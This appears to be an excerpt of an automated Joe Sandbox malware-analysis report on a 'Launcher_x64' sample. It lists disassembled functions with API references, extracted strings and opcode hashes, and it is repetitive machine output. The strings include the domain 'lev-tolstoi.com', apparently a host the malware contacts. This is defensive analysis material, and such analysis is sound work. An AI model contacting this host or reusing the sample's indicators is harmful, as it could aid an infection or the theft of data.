                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: 53$:$VM_U$mqoh$sqmp$tpfr
                                                                                                                                                                                                                                                                                        • API String ID: 0-2138070392
                                                                                                                                                                                                                                                                                        • Opcode ID: 1b6664af7c86144a3a54590cf0e283a340205974ec49d180384c121aab9cc47b
                                                                                                                                                                                                                                                                                        • Instruction ID: f47402dcdedb2c55df3baf03e9a527227207cfd323fcd0d5de5a024943b09c0f
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1b6664af7c86144a3a54590cf0e283a340205974ec49d180384c121aab9cc47b
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 32814D712083818AD705CF29C5913BBFFE29FE2244F1845BED4C1AB382D73D890A8766
                                                                                                                                                                                                                                                                                        Function 0042E5B9 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 312COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(36557EAD), ref: 0042E8B3
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: FreeLibrary
                                                                                                                                                                                                                                                                                        • String ID: >$ZWUZ
                                                                                                                                                                                                                                                                                        • API String ID: 3664257935-985827506
                                                                                                                                                                                                                                                                                        • Opcode ID: 0e253cd56e222866700ffa9963fdf96bff6b78a94975377ed1d89dba3caa6cd8
                                                                                                                                                                                                                                                                                        • Instruction ID: 0a8d9c81c674254a7875c1a056ece1788b71ca50f13d2924f3fb4fdd7b55783f
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0e253cd56e222866700ffa9963fdf96bff6b78a94975377ed1d89dba3caa6cd8
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3DA158307443418FE7258F29C881B63BBD2EF96310F588A6ED59A4F3C2D638A805C759
                                                                                                                                                                                                                                                                                        Function 00419930 Relevance: 4.5, APIs: 2, Instructions: 1487COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 0043C390: LdrInitializeThunk.NTDLL(0043E4EB,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043C3BE
                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00419F8A
                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 0041A02B
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: FreeLibrary$InitializeThunk
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 764372645-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 75c1769443dfcf37383e30ada7ff87d8ca741cbdbf89dd6d3a15acba7a5b1347
                                                                                                                                                                                                                                                                                        • Instruction ID: ad8069fa9921c6545925a63361968e707b1cec5adc7f1e82dd6ec27db36ef7ad
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 75c1769443dfcf37383e30ada7ff87d8ca741cbdbf89dd6d3a15acba7a5b1347
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B0929A76A493409BD324CF25CC947ABBBE2EBC9310F28842DE4C587791D678DC96CB46
                                                                                                                                                                                                                                                                                        Function 0042E106 Relevance: 4.0, Strings: 3, Instructions: 281COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: IO{H$p$w&$yX=Z
                                                                                                                                                                                                                                                                                        • API String ID: 0-258344299
                                                                                                                                                                                                                                                                                        • Opcode ID: ac168e5c794510c57f396d26eafb5eb82ea17d1e137a0f7fc6b4058d790f4dee
                                                                                                                                                                                                                                                                                        • Instruction ID: c97448ef1a2de08e62a4c346c0761d5c328fedc96c5d8dc6c146683e4c5ce246
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ac168e5c794510c57f396d26eafb5eb82ea17d1e137a0f7fc6b4058d790f4dee
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A39114706047518FD319CF26D4A0723BBE2AF97304F28C99ED4E64B796C639E402CB55
                                                                                                                                                                                                                                                                                        Function 0042E1EA Relevance: 4.0, Strings: 3, Instructions: 276COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: IO{H$p$w&$yX=Z
                                                                                                                                                                                                                                                                                        • API String ID: 0-258344299
                                                                                                                                                                                                                                                                                        • Opcode ID: 21c65a4614b2094b7f09e0f2480a2d4b02bbdd23b0e933c442b79c8e4819c543
                                                                                                                                                                                                                                                                                        • Instruction ID: 10a4cfb9e9bc71fe82d616fa4186f7c032dadb14d920d1e75fe80738303b050f
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 21c65a4614b2094b7f09e0f2480a2d4b02bbdd23b0e933c442b79c8e4819c543
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E69112706047518FD719CF26D4A0723BBE2AF97304F28C59ED4E68B396C63AE402CB55
                                                                                                                                                                                                                                                                                        Function 0042E246 Relevance: 4.0, Strings: 3, Instructions: 276COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: IO{H$p$w&$yX=Z
                                                                                                                                                                                                                                                                                        • API String ID: 0-258344299
                                                                                                                                                                                                                                                                                        • Opcode ID: 579baf21dd3e77a5de39d7429a66f87c1b0c687d54997badf17cfdc843ff598b
                                                                                                                                                                                                                                                                                        • Instruction ID: 98b56ffdc51e17c0044a49197562225fbdb646ff068fb30864dfdb594c0d2ab9
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 579baf21dd3e77a5de39d7429a66f87c1b0c687d54997badf17cfdc843ff598b
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6D9113706047518FD719CF3694A0723BBE2AF97304F28C59ED4E68B396C63AE402CB55
                                                                                                                                                                                                                                                                                        Function 0040C773 Relevance: 4.0, Strings: 3, Instructions: 266COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: DE$lev-tolstoi.com$?C
                                                                                                                                                                                                                                                                                        • API String ID: 0-153105410
                                                                                                                                                                                                                                                                                        • Opcode ID: ef1cf972215bdc8c0bc29a5e7f7c6cd2b62f4c9deeff44dc2325ac8eb1e142dc
                                                                                                                                                                                                                                                                                        • Instruction ID: b0d799d0c5ff02fbdd18a9f9d11949fd93bd32b37df7853c51a825a64bed87eb
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ef1cf972215bdc8c0bc29a5e7f7c6cd2b62f4c9deeff44dc2325ac8eb1e142dc
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6D9126B144D3D18FD3318F6588907EBBFE1ABD6310F198A6DC4D86B382D6790909CB96
                                                                                                                                                                                                                                                                                        Function 0042E234 Relevance: 4.0, Strings: 3, Instructions: 249COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: IO{H$p$w&$yX=Z
                                                                                                                                                                                                                                                                                        • API String ID: 0-258344299
                                                                                                                                                                                                                                                                                        • Opcode ID: 91abf5d5f44ba0007092eb3476dbfaf43d5ab6ab314252f32db8800f8a38335f
                                                                                                                                                                                                                                                                                        • Instruction ID: 6360d782b84a95e2d96c1a87e186f2c39caee5b9ed871cbbab4650e988f8af77
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 91abf5d5f44ba0007092eb3476dbfaf43d5ab6ab314252f32db8800f8a38335f
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 407102716047908FD315CF2694A0723BBE2AF97304F28C59ED4E64B796C639E806CB59
                                                                                                                                                                                                                                                                                        Function 00414DB4 Relevance: 4.0, Strings: 3, Instructions: 225COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: 7$gfff$tu
                                                                                                                                                                                                                                                                                        • API String ID: 0-496940666
                                                                                                                                                                                                                                                                                        • Opcode ID: b1e15ac469a5da1c2f10c9dc0032808268a8cc6eadfb6d613c60b59fe4ea4cb3
                                                                                                                                                                                                                                                                                        • Instruction ID: 0865dfbf79774b2a2b0c8fd8156debe70b6d641c39cd8d8e57a19c5ce7866f8b
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b1e15ac469a5da1c2f10c9dc0032808268a8cc6eadfb6d613c60b59fe4ea4cb3
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E9713275A043118BD728CF18D8617BB77E2FBC5304F58862EE486CB395EB3899468B85
                                                                                                                                                                                                                                                                                        Function 0042B801 Relevance: 3.1, Strings: 2, Instructions: 555COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: \g$6
                                                                                                                                                                                                                                                                                        • API String ID: 0-3854233087
                                                                                                                                                                                                                                                                                        • Opcode ID: 3d7e5de33235349de088db667f173bb68dea14ccd507be2303a4f191808bc736
                                                                                                                                                                                                                                                                                        • Instruction ID: 94c3f3c97a1d5e79b2ad8a6ad4342fa13f5320d73f4efefc864be8e3607bbcf5
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3d7e5de33235349de088db667f173bb68dea14ccd507be2303a4f191808bc736
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4B127EB4904B829FD3219F399292663BFB0FF12300F54865ED4E64BB45D335A42ACBD6
                                                                                                                                                                                                                                                                                        Function 00429BA0 Relevance: 2.8, Strings: 2, Instructions: 346COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: BLCJ$N@FN
                                                                                                                                                                                                                                                                                        • API String ID: 0-3139961213
                                                                                                                                                                                                                                                                                        • Opcode ID: 70fd856913ae7392fe0c6458f394fc9319144197031aef01fc4015dc9b560a74
                                                                                                                                                                                                                                                                                        • Instruction ID: cf93fe7613e2a8793a112244e2a734f3b84eace94cbb547789e25485c7b46e90
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 70fd856913ae7392fe0c6458f394fc9319144197031aef01fc4015dc9b560a74
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1AB1657460C754DFE7109F20A84176BBBF4EF8A314F44093DF5849B2A2D7789906CB8A
                                                                                                                                                                                                                                                                                        Function 0042623D Relevance: 2.7, Strings: 2, Instructions: 181COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: .jB$VCQA
                                                                                                                                                                                                                                                                                        • API String ID: 0-3993559281
                                                                                                                                                                                                                                                                                        • Opcode ID: b40c3223a189a0cd7fdac5c1d5a372e8040aa132ef09f6664990ef57179866c4
                                                                                                                                                                                                                                                                                        • Instruction ID: 2300ab299786d9f34492229890a02b6ba3baefb8a29c2efd7581561b247dd9bb
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b40c3223a189a0cd7fdac5c1d5a372e8040aa132ef09f6664990ef57179866c4
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 18518C717493618FD720DB2898C0267BB92DF96350F8A867ED4D10B3D2D73D8809D39A
                                                                                                                                                                                                                                                                                        Function 00416DCF Relevance: 2.6, Strings: 2, Instructions: 90COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: 0oA$I'j)
                                                                                                                                                                                                                                                                                        • API String ID: 0-1810545798
                                                                                                                                                                                                                                                                                        • Opcode ID: 4ba76e1b5db9f385e37d06866b11f846ce89df63c700cbb9aec8f4e6f00611e1
                                                                                                                                                                                                                                                                                        • Instruction ID: 0092929035da20e583a51c72eb37b1bbfe9614ff92be8b352ed13965c520a811
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4ba76e1b5db9f385e37d06866b11f846ce89df63c700cbb9aec8f4e6f00611e1
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8831C0B1546341CBC3209F14C9546ABB7F2FFD2714F598A1EE4899B390E338C841CB8A
                                                                                                                                                                                                                                                                                        Function 0041E6A0 Relevance: 1.5, Strings: 1, Instructions: 204COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: lEZ[
                                                                                                                                                                                                                                                                                        • API String ID: 0-2584274222
                                                                                                                                                                                                                                                                                        • Opcode ID: f303e30422931e10d672eec72d6aa1dabff2b68cc19d8b03798bb15b66eb6020
                                                                                                                                                                                                                                                                                        • Instruction ID: a51eeb7752b6365748cb99579e22aeedeabe5e6500fba97ac20d794f2f7b89a7
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f303e30422931e10d672eec72d6aa1dabff2b68cc19d8b03798bb15b66eb6020
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 20617B399083908FD3259F2AC88096F7BE1AF95324F4881BEECE447392D635DC46C796
                                                                                                                                                                                                                                                                                        Function 0043EAF0 Relevance: 1.4, Strings: 1, Instructions: 162COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                        • String ID: <;:9
                                                                                                                                                                                                                                                                                        • API String ID: 2994545307-3375088645
                                                                                                                                                                                                                                                                                        • Opcode ID: a0c0ed737b2660164212d3fe5a028c77e4ce9ffc60af5f4730cee43378f6fb4b
                                                                                                                                                                                                                                                                                        • Instruction ID: 32371bfa02755528203ac100cb9c3482a13548a5864d6b08e87e80e62c56b9c0
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a0c0ed737b2660164212d3fe5a028c77e4ce9ffc60af5f4730cee43378f6fb4b
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E841F376B05310ABE720CE66CC81B3BF3D6A7CD714F19653DE989A7390D229AC009799
                                                                                                                                                                                                                                                                                        Function 0040A03B Relevance: 1.3, Strings: 1, Instructions: 24COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: lev-tolstoi.com
                                                                                                                                                                                                                                                                                        • API String ID: 0-483096278
                                                                                                                                                                                                                                                                                        • Opcode ID: 5a509271d27b97c8b237ef2f3a480366bd364bd361ba63c71ae393b9785d4f20
                                                                                                                                                                                                                                                                                        • Instruction ID: 1ad9fdfbc3d6cb17ac050f525aea47afc3ee2b555b898c82acf40e87dda8770c
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5a509271d27b97c8b237ef2f3a480366bd364bd361ba63c71ae393b9785d4f20
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E1E01A784082018AC314DF04C861673B3B1EF4A746F002869E882DB351E3789944EB1E
                                                                                                                                                                                                                                                                                        Function 0043D2D7 Relevance: 1.3, Strings: 1, Instructions: 12COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: ;4
                                                                                                                                                                                                                                                                                        • API String ID: 0-2844496594
                                                                                                                                                                                                                                                                                        • Opcode ID: d07b8aae4d3ffa7cf2037fd880fc1f4a3fbeaa4e2a8c4ef377a0d0af8a7a17f3
                                                                                                                                                                                                                                                                                        • Instruction ID: 7363c5d5b30630db63bb1429aabaa7102bdc9a509c3d35576b252daf177e8021
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d07b8aae4d3ffa7cf2037fd880fc1f4a3fbeaa4e2a8c4ef377a0d0af8a7a17f3
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A1C04C28A5C54087820C8B54E8628756265D74B25CB25782AC44363651E614E812961D
                                                                                                                                                                                                                                                                                        Function 0043D3C3 Relevance: 1.3, Strings: 1, Instructions: 12COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: ;4
                                                                                                                                                                                                                                                                                        • API String ID: 0-2844496594
                                                                                                                                                                                                                                                                                        • Opcode ID: 6a03a5d961d4a122c6154f95f5aa4860e6ee92da11f370473c03fb86c44c9108
                                                                                                                                                                                                                                                                                        • Instruction ID: 85792f14a85af9483b54351255db2ddb1787a32507df71d9a856159f0c301117
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6a03a5d961d4a122c6154f95f5aa4860e6ee92da11f370473c03fb86c44c9108
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9FC04C38A5C54087860CCF44D863CB5B375E75735CB25642AC44237651D625F812961C
                                                                                                                                                                                                                                                                                        Function 00413DE0 Relevance: .7, Instructions: 662COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 9975d5096d2df598f8f1b18b65e16e51dc04a4eb8820b26996945d24d50b5e07
                                                                                                                                                                                                                                                                                        • Instruction ID: 4646a0a207e90d32a5f07b6c062fc331b9b4eda89b06272facc8898fe6ae0c9d
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9975d5096d2df598f8f1b18b65e16e51dc04a4eb8820b26996945d24d50b5e07
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CB023476A083008FD704DF25D8527ABB7F1EF85319F18842DE88587391E779DA46CB8A
                                                                                                                                                                                                                                                                                        Function 00407470 Relevance: .6, Instructions: 611COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 7bda4b375fcd006c169eac15fcd02c62b224c6f04cfe56def1b0a70d90047895
                                                                                                                                                                                                                                                                                        • Instruction ID: 8249dbe79435663dbc1fb59fae99bab8598ac9d7fe647922c150dd54caf7bf00
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7bda4b375fcd006c169eac15fcd02c62b224c6f04cfe56def1b0a70d90047895
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EB12A272A0C7118BC725DF18D8806ABB3E2BFC4315F19893ED586A7385D738B8118B87
                                                                                                                                                                                                                                                                                        Function 00428950 Relevance: .6, Instructions: 572COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 4619cf223af8198b88be87ebf92622dc091b301b5c108c2c1874c49d52a6af1e
                                                                                                                                                                                                                                                                                        • Instruction ID: 5aa941da1f976eaeaa8b35b143c2842886abe6ff6a68546d006384ec7a1d2cee
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4619cf223af8198b88be87ebf92622dc091b301b5c108c2c1874c49d52a6af1e
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1302EF71A0C3218BD724CF64D88076FB3E2EBD5304F04493DE9959B282EB759909CB9A
                                                                                                                                                                                                                                                                                        Function 00438680 Relevance: .5, Instructions: 453COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
